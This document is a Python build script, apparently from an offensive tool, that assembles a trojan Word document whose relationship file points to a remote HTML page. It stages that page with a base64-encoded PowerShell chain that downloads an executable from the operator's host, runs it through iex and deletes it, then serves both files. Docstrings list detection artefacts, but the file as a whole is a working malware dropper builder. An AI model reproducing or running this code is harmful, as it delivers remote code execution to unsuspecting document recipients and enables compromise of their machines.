init.py
from base64 import b64encode
from os import listdir, remove, rename
from shutil import copyfile, copytree, make_archive, rmtree
from xml.etree import ElementTree as ET
from server import init_server
def build_payload(host: str, port: int, build_directory: str) -> str:
    """Render the staged landing page ``server/index.html`` and return its path.

    Takes the first ``*.exe`` found under ``bin/`` and embeds, into the HTML
    template copied from ``<build_directory>/index.html``, a base64-encoded
    PowerShell command string that (1) downloads that executable from
    ``http://<host>:<port>/bin/<name>`` onto the user's Desktop, (2) runs it
    through ``iex`` and (3) deletes the dropped file again.  Observable
    artefacts for detection are therefore: an HTTP GET for ``/bin/<name>.exe``,
    a short-lived executable on the Desktop, and a PowerShell invocation
    carrying a base64 blob that decodes to an ``iwr ... | iex`` chain.

    Args:
        host: Hostname or IP address the page and binary are fetched from.
        port: TCP port of that server.
        build_directory: Directory holding the ``index.html`` template.

    Returns:
        The path of the rewritten HTML file (``server/index.html``).

    Raises:
        StopIteration: if ``bin/`` contains no ``*.exe`` (``next`` is called
            without a default).
        FileNotFoundError: if ``bin/``, the HTML template or ``build/href.txt``
            does not exist.
    """
    payload_build_path = "bin"
    # First *.exe in bin/.  listdir order is arbitrary, so with several
    # executables present the choice is nondeterministic.
    payload_name = next(file for file in listdir(payload_build_path) if file.endswith(".exe"))
    # A PowerShell sub-expression string; it is evaluated on the receiving
    # machine, not here.
    payload_target_path = f"$($env:USERPROFILE + '/Desktop/' + '{payload_name}')"
    html_name = "index.html"
    html_build_path = f"server/{html_name}"
    copyfile(f"{build_directory}/{html_name}", html_build_path)
    # Three PowerShell statements joined with "; ": download, execute, remove.
    powershell_commands = "; ".join([
        f"iwr http://{host}:{port}/{payload_build_path}/{payload_name} -OutFile {payload_target_path}",
        f"{payload_target_path} | iex",
        f"rm -Force -Path {payload_target_path}"
    ]).encode("utf-8")
    # href.txt is a second template whose "{ staged_commands }" marker receives
    # the base64 form of the command string.  Neither template is visible in
    # this file, so how the blob is decoded client-side cannot be told from here.
    with open("build/href.txt") as file:
        staged_payload = file.read().replace("{ staged_commands }", b64encode(powershell_commands).decode("utf-8"))
    # In-place rewrite: read all, seek(0), write the substituted text.  There is
    # no truncate(), so this only yields a clean file if the substituted text is
    # at least as long as the original (presumably the case, since a base64
    # blob replaces a short marker — not provable without the templates).
    with open(html_build_path, "r+") as file:
        new_data = file.read().replace("{ staged_payload }", staged_payload)
        file.seek(0)
        file.write(new_data)
    return html_build_path
def build_trojan(host: str, port: int, build_directory: str) -> str:
    """Assemble ``trojan.docx`` from the unpacked OOXML tree under ``<build_directory>/docx``.

    The only edit made to the package is in ``word/_rels/document.xml.rels``,
    where the ``{ staged_html }`` marker is replaced by
    ``http://<host>:<port>/server``.  The template tree is not shown in this
    file, so which relationship carries the marker is not visible here; the
    detection-relevant artefact is a ``.rels`` entry whose target is a remote
    HTTP URL rather than a part inside the package.

    Args:
        host: Hostname or IP address written into the relationship target.
        port: TCP port written into the relationship target.
        build_directory: Directory containing the unpacked ``docx`` template tree.

    Returns:
        The file name of the produced document, ``trojan.docx``, which is
        written to the current working directory.

    Raises:
        FileExistsError: ``copytree`` refuses to copy onto an existing ``docx``
            directory (``dirs_exist_ok`` defaults to False), e.g. left over
            from an earlier run that never reached ``rmtree``.
    """
    trojan_name = "trojan"
    trojan_build_path = f"{build_directory}/docx"
    trojan_target_path = "docx"
    trojan_file_name = f"{trojan_name}.docx"
    # Work on a copy in the CWD so the template under build/ is left untouched.
    copytree(trojan_build_path, trojan_target_path)
    # Point the templated relationship at the host that serves server/index.html
    # (presumably via the `server` module; not visible here).  Same
    # read/seek(0)/write pattern as build_payload, without truncate(); the
    # marker is 15 characters and the shortest URL this f-string can produce is
    # longer, so no stale tail is left behind.
    with open(f"{trojan_target_path}/word/_rels/document.xml.rels", "r+") as f:
        new_data = f.read().replace("{ staged_html }", f"http://{host}:{port}/server")
        f.seek(0)
        f.write(new_data)
    # A .docx is a zip container: archive the tree, then swap the extension.
    make_archive(trojan_name, "zip", trojan_target_path)
    rename(f"{trojan_name}.zip", trojan_file_name)
    rmtree(trojan_target_path)
    return trojan_file_name
def main():
    """Build both artefacts from ``config.xml``, run the server, then clean up.

    ``config.xml`` must have ``<name>`` and ``<port>`` children of its root
    element; ``find(...).text`` raises ``AttributeError`` if either is absent,
    and ``int(...)`` raises ``ValueError`` for a non-numeric port.
    ``init_server`` is imported from the local ``server`` module (not shown);
    the trailing cleanup and its comment indicate it blocks until the server
    shuts down.
    """
    root = ET.parse("config.xml").getroot()
    # Text of the first direct child of the root with the given tag.
    get_element_from_host = lambda element: root.find(element).text
    host_name = get_element_from_host("name")
    port = int(get_element_from_host("port"))
    build_directory = "build"
    # Both outputs land relative to the CWD: ./trojan.docx and ./server/index.html.
    staged_trojan_path = build_trojan(host_name, port, build_directory)
    staged_html_path = build_payload(host_name, port, build_directory)
    init_server(host_name, port)
    # Clean up when the server closes
    remove(staged_trojan_path)
    remove(staged_html_path)
# Script entry point; importing the module runs nothing.
if __name__ == "__main__":
    main()